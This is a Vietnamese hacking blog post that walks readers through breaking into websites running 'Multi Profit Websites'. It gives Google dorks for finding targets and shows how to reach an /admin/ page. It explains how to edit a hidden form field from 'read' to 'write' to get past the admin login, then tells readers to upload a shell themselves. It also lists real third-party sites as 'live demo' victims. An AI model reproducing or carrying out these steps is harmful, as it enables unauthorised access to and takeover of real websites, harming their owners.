Bài liên quan
Tôi biết bạn đang nghĩ đây là một kĩ thuật rất là ngu phải nói là ngu xuẩn.




Finding Vulnerable Target :

Dorks:

intext:"Powered By: Multi Profit Websites"
inurl:/index_ebay.php
inurl:/index_amazon.php
inurl:/index_rrfc.php
inurl:/index_info.php
inurl:/index_youtube.php
inurl:/index_rss.php


1- Copy nó và paste vào google sau đó chọn một site bất kỳ.

2- Chèn vào /admin/ vào đuôi của link site.

Ví dụ :

http://martincommodities.com/sitemap.php

Thì thành :

http://martincommodities.com/admin/


Bạn sẽ có một trang login admin control panel như thế này.




Bắt đầu nào.

1- Truy cập trang login admin control panel sau đó click chuột phải và nhấp Inspect Element.Và nó sẽ thành như thế này nhé. Dùng Google Chrome hoặc Cốc Cốc nhé.





2- Giờ tìm dòng mà giống cái bên dưới

<input type="hidden" name="do_type" value="admin_setting_read">  .

 Bạn hãy chú ý vào hidden , bởi vì ta sẽ sửa  "hidden" thành "text" chú ý tiếp vào "admin_setting_read" . Sửa "read" thành "write"nó sẽ thành như thế này "admin_setting_write
Sau đó bấm enter và nó thành như thế này.


Enter một lần nữa thì nó sẽ thành như thế này



Click login và thưởng thức.



Việc còn lại các bạn tự upload shell nhé.
Live Demo :
http://www.socialmediabusinesssuccesstraining.com/index.htm
http://www.trainingforsocialmediauniversity.com/index.html
http://starlitebooks.com/index.php
http://www.prostatedu.info/
http://www.menshealthhelpblog.com/
http://www.diabetesedu.info/
 
Nguồn: Bear 

Post a Comment

 
Top

Nhận xét mới đăng tải!

Loading…
X